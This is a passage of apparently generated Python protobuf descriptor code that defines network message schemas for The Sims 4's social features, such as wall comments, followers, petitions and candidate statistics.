descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='uuid',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.uuid',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2477,
serialized_end=2562)
_SOCIALREQUESTFEEDWALLMESSAGE = descriptor.Descriptor(name='SocialRequestFeedWallMessage',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='ending_uuid',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.ending_uuid',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='messages',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.messages',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='unserialized_messages',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.unserialized_messages',
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_items',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.num_items',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2565,
serialized_end=2778)
_SOCIALREQUESTFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialRequestFollowersMessage',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='playerid',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.playerid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='id',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.id',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='prev_last_persona',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.prev_last_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_request',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.num_request',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2780,
serialized_end=2889)
_SOCIALREQUESTIGNORELISTMESSAGE = descriptor.Descriptor(name='SocialRequestIgnoreListMessage',
full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='player_nucleus_id',
full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage.player_nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2891,
serialized_end=2950)
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleus_id',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='origin_persona',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.origin_persona',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='first_party_persona',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.first_party_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3101,
serialized_end=3186)
_SOCIALGETPLAYERINFOLISTMESSAGE = descriptor.Descriptor(name='SocialGetPlayerInfoListMessage',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='player_nucleus_id',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='player_info_list',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_info_list',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2953,
serialized_end=3186)
_SOCIALCOMMENTPETITIONMESSAGE = descriptor.Descriptor(name='SocialCommentPetitionMessage',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='commentid',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentid',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='commentKey',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentKey',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3188,
serialized_end=3276)
_SOCIALBIOPETITIONMESSAGE = descriptor.Descriptor(name='SocialBioPetitionMessage',
full_name='EA.Sims4.Network.SocialBioPetitionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialBioPetitionMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='bio_nucleusid',
full_name='EA.Sims4.Network.SocialBioPetitionMessage.bio_nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3278,
serialized_end=3346)
_SOCIALFEEDREMOVALMESSAGE = descriptor.Descriptor(name='SocialFeedRemovalMessage',
full_name='EA.Sims4.Network.SocialFeedRemovalMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedRemovalMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3348,
serialized_end=3391)
_SOCIALCONTROLMESSAGE = descriptor.Descriptor(name='SocialControlMessage',
full_name='EA.Sims4.Network.SocialControlMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='opcode',
full_name='EA.Sims4.Network.SocialControlMessage.opcode',
index=0,
number=1,
type=14,
cpp_type=8,
label=2,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='subop',
full_name='EA.Sims4.Network.SocialControlMessage.subop',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='transactionId',
full_name='EA.Sims4.Network.SocialControlMessage.transactionId',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='result',
full_name='EA.Sims4.Network.SocialControlMessage.result',
index=3,
number=100,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='getwallcommentsmsg',
full_name='EA.Sims4.Network.SocialControlMessage.getwallcommentsmsg',
index=4,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postwallcommentmsg',
full_name='EA.Sims4.Network.SocialControlMessage.postwallcommentmsg',
index=5,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='deletewallcommentmsg',
full_name='EA.Sims4.Network.SocialControlMessage.deletewallcommentmsg',
index=6,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friendmsg',
full_name='EA.Sims4.Network.SocialControlMessage.friendmsg',
index=7,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='genericresponse',
full_name='EA.Sims4.Network.SocialControlMessage.genericresponse',
index=8,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='playerinfo',
full_name='EA.Sims4.Network.SocialControlMessage.playerinfo',
index=9,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feedsubmsg',
full_name='EA.Sims4.Network.SocialControlMessage.feedsubmsg',
index=10,
number=10,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='searchresultmsg',
full_name='EA.Sims4.Network.SocialControlMessage.searchresultmsg',
index=11,
number=11,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='inviteresponsemsg',
full_name='EA.Sims4.Network.SocialControlMessage.inviteresponsemsg',
index=12,
number=12,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='originerror',
full_name='EA.Sims4.Network.SocialControlMessage.originerror',
index=13,
number=13,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialcassandratest',
full_name='EA.Sims4.Network.SocialControlMessage.socialcassandratest',
index=14,
number=14,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialfriendlistrequestmsg',
full_name='EA.Sims4.Network.SocialControlMessage.socialfriendlistrequestmsg',
index=15,
number=15,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialrequestnucleusidfrompersona',
full_name='EA.Sims4.Network.SocialControlMessage.socialrequestnucleusidfrompersona',
index=16,
number=16,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialnucleusidfrompersonaresponse',
full_name='EA.Sims4.Network.SocialControlMessage.socialnucleusidfrompersonaresponse',
index=17,
number=17,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialexchangemessage',
full_name='EA.Sims4.Network.SocialControlMessage.socialexchangemessage',
index=18,
number=18,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialrequestfeedwallmessage',
full_name='EA.Sims4.Network.SocialControlMessage.socialrequestfeedwallmessage',
index=19,
number=19,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='stat_tickers',
full_name='EA.Sims4.Network.SocialControlMessage.stat_tickers',
index=20,
number=21,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='comment_petition_msg',
full_name='EA.Sims4.Network.SocialControlMessage.comment_petition_msg',
index=21,
number=22,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feedremovalmsg',
full_name='EA.Sims4.Network.SocialControlMessage.feedremovalmsg',
index=22,
number=23,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='bio_petition_msg',
full_name='EA.Sims4.Network.SocialControlMessage.bio_petition_msg',
index=23,
number=24,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='fb_event_msg',
full_name='EA.Sims4.Network.SocialControlMessage.fb_event_msg',
index=24,
number=25,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='requestfollowers_msg',
full_name='EA.Sims4.Network.SocialControlMessage.requestfollowers_msg',
index=25,
number=26,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='responsefollowers_msg',
full_name='EA.Sims4.Network.SocialControlMessage.responsefollowers_msg',
index=26,
number=27,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='requestignorelist_msg',
full_name='EA.Sims4.Network.SocialControlMessage.requestignorelist_msg',
index=27,
number=28,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='response_player_info_list_msg',
full_name='EA.Sims4.Network.SocialControlMessage.response_player_info_list_msg',
index=28,
number=29,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='player_identification_list_msg',
full_name='EA.Sims4.Network.SocialControlMessage.player_identification_list_msg',
index=29,
number=30,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidate_msg',
full_name='EA.Sims4.Network.SocialControlMessage.candidate_msg',
index=30,
number=31,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='evaluation_results_msg',
full_name='EA.Sims4.Network.SocialControlMessage.evaluation_results_msg',
index=31,
number=32,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='cg_update_msg',
full_name='EA.Sims4.Network.SocialControlMessage.cg_update_msg',
index=32,
number=33,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3394,
serialized_end=5713)
_SOCIALINVALIDATEMSG = descriptor.Descriptor(name='SocialInvalidateMsg',
full_name='EA.Sims4.Network.SocialInvalidateMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='cache_index',
full_name='EA.Sims4.Network.SocialInvalidateMsg.cache_index',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='key',
full_name='EA.Sims4.Network.SocialInvalidateMsg.key',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5715,
serialized_end=5770)
_SOCIALCONTROLQUEUEBROADCASTMESSAGE = descriptor.Descriptor(name='SocialControlQueueBroadcastMessage',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='control',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.control',
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friendIds',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.friendIds',
index=1,
number=3,
type=4,
cpp_type=4,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5772,
serialized_end=5888)
_LIFEEVENTMESSAGE = descriptor.Descriptor(name='LifeEventMessage',
full_name='EA.Sims4.Network.LifeEventMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='type',
full_name='EA.Sims4.Network.LifeEventMessage.type',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='sim_ids',
full_name='EA.Sims4.Network.LifeEventMessage.sim_ids',
index=1,
number=2,
type=6,
cpp_type=4,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5890,
serialized_end=5943)
_SOCIALFACEBOOKEVENTMESSAGE = descriptor.Descriptor(name='SocialFacebookEventMessage',
full_name='EA.Sims4.Network.SocialFacebookEventMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='objectId',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.objectId',
index=0,
number=1,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='accessToken',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.accessToken',
index=1,
number=2,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='guid',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.guid',
index=2,
number=3,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5945,
serialized_end=6026)
_SOCIALCANDIDATESTATISTICSUBMESSAGE = descriptor.Descriptor(name='SocialCandidateStatisticSubmessage',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='remote_id',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.remote_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='views_count',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.views_count',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='wins_count',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.wins_count',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='platform',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.platform',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='category',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.category',
index=4,
number=5,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='was_reported',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.was_reported',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x18\x01'))),
descriptor.FieldDescriptor(name='expires_epoch_sec',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.expires_epoch_sec',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6029,
serialized_end=6214)
_SOCIALCANDIDATESMESSAGE = descriptor.Descriptor(name='SocialCandidatesMessage',
full_name='EA.Sims4.Network.SocialCandidatesMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='count',
full_name='EA.Sims4.Network.SocialCandidatesMessage.count',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='platform_restriction',
full_name='EA.Sims4.Network.SocialCandidatesMessage.platform_restriction',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='category_restriction',
full_name='EA.Sims4.Network.SocialCandidatesMessage.category_restriction',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='challenge',
full_name='EA.Sims4.Network.SocialCandidatesMessage.challenge',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='digest',
full_name='EA.Sims4.Network.SocialCandidatesMessage.digest',
index=4,
number=5,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidates',
full_name='EA.Sims4.Network.SocialCandidatesMessage.candidates',
index=5,
number=6,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='expire_epoch_secs',
full_name='EA.Sims4.Network.SocialCandidatesMessage.expire_epoch_secs',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6217,
serialized_end=6453)
_SOCIALEVALUATIONRESULTSMESSAGE = descriptor.Descriptor(name='SocialEvaluationResultsMessage',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='winner_ids',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.winner_ids',
index=0,
number=1,
type=9,
